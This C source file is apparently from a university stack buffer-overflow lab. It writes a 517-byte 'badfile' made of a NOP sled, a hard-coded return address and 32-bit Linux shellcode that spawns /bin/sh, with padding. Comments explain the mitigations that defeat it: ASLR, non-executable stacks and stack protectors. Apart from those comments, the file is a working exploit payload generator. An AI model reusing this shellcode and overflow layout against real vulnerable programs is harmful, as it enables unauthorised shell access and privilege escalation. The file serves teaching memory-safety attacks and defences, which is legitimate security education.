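// Credit: given by our homework handout and modified, documented in lab report.

/* exploit.c */

/*
 * Course-lab program that writes a 517-byte file, "./badfile", used as the
 * input for a stack buffer-overflow exercise. The file holds a NOP fill
 * (0x90), a hard-coded 32-bit little-endian address, the shellcode below,
 * and a run of 'A' padding.
 *
 * Defender's reading of this file:
 *   - The address is a fixed stack address, so the payload only lines up
 *     when the target's stack layout is predictable (address-space layout
 *     randomization turned off).
 *   - The shellcode is meant to run from the stack, which a non-executable
 *     stack (NX/DEP) prevents.
 *   - The offsets are tuned to one specific target binary that is not part
 *     of this file. Bounds-checked copies in that target, or a stack
 *     protector, are the mitigations for this class of bug.
 */

#include <stdlib.h>
#include <stdio.h>
#include <string.h>

/* Size of the generated file; fixed by the lab handout. */
enum { BADFILE_SIZE = 517 };

/*
 * 32-bit Linux shellcode as supplied by the handout. Per the instruction
 * annotations it builds the string "/bin//sh" on the stack and issues
 * int $0x80 with %al = 0x0b.
 */
char shellcode[]=
    "\x31\xc0"             /* xorl    %eax,%eax              */
    "\x50"                 /* pushl   %eax                   */
    "\x68""//sh"           /* pushl   $0x68732f2f            */
    "\x68""/bin"           /* pushl   $0x6e69622f            */
    "\x89\xe3"             /* movl    %esp,%ebx              */
    "\x50"                 /* pushl   %eax                   */
    "\x53"                 /* pushl   %ebx                   */
    "\x89\xe1"             /* movl    %esp,%ecx              */
    "\x99"                 /* cdql                           */
    "\xb0\x0b"             /* movb    $0x0b,%al              */
    "\xcd\x80"             /* int     $0x80                  */
;

/*
 * Build the buffer and write it to "./badfile".
 *
 * Returns EXIT_SUCCESS when the whole file was written and closed without
 * error, EXIT_FAILURE otherwise (a diagnostic is printed to stderr).
 * Command-line arguments are not used.
 */
int main(int argc, char **argv)
{
    char buffer[BADFILE_SIZE];
    FILE *badfile;

    (void)argc;
    (void)argv;

    /* Initialize buffer with 0x90 (NOP instruction) */
    memset(buffer, 0x90, sizeof buffer);

    /*
     * The three copies below are kept as strcpy so the generated file stays
     * byte-identical to the handout version. Note that strcpy also stores a
     * terminating NUL byte after each string it copies.
     */

    // Inject the shellcode into the buffer.
    strcpy(&buffer[33], shellcode);

    // Padding; starts on the shellcode's terminating NUL and overwrites it.
    strcpy(&buffer[57], "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");

    /*
     * Hard-coded address 0xbffff2f8 in little-endian byte order, followed by
     * strcpy's NUL at offset 20. The original comment says this points the
     * ebp register at the injected code; which saved value these four bytes
     * actually land on depends on the target's stack frame, which is not
     * shown here.
     */
    strcpy(&buffer[16], "\xf8\xf2\xff\xbf");

    /* Save the contents to the file "badfile" */
    /* Binary mode: the buffer is raw bytes, not text. */
    badfile = fopen("./badfile", "wb");
    if (badfile == NULL) {
        perror("fopen ./badfile");
        return EXIT_FAILURE;
    }

    if (fwrite(buffer, sizeof buffer, 1, badfile) != 1) {
        perror("fwrite ./badfile");
        fclose(badfile);
        return EXIT_FAILURE;
    }

    /* fclose flushes buffered data, so a failure here means a short file. */
    if (fclose(badfile) != 0) {
        perror("fclose ./badfile");
        return EXIT_FAILURE;
    }

    return EXIT_SUCCESS;
}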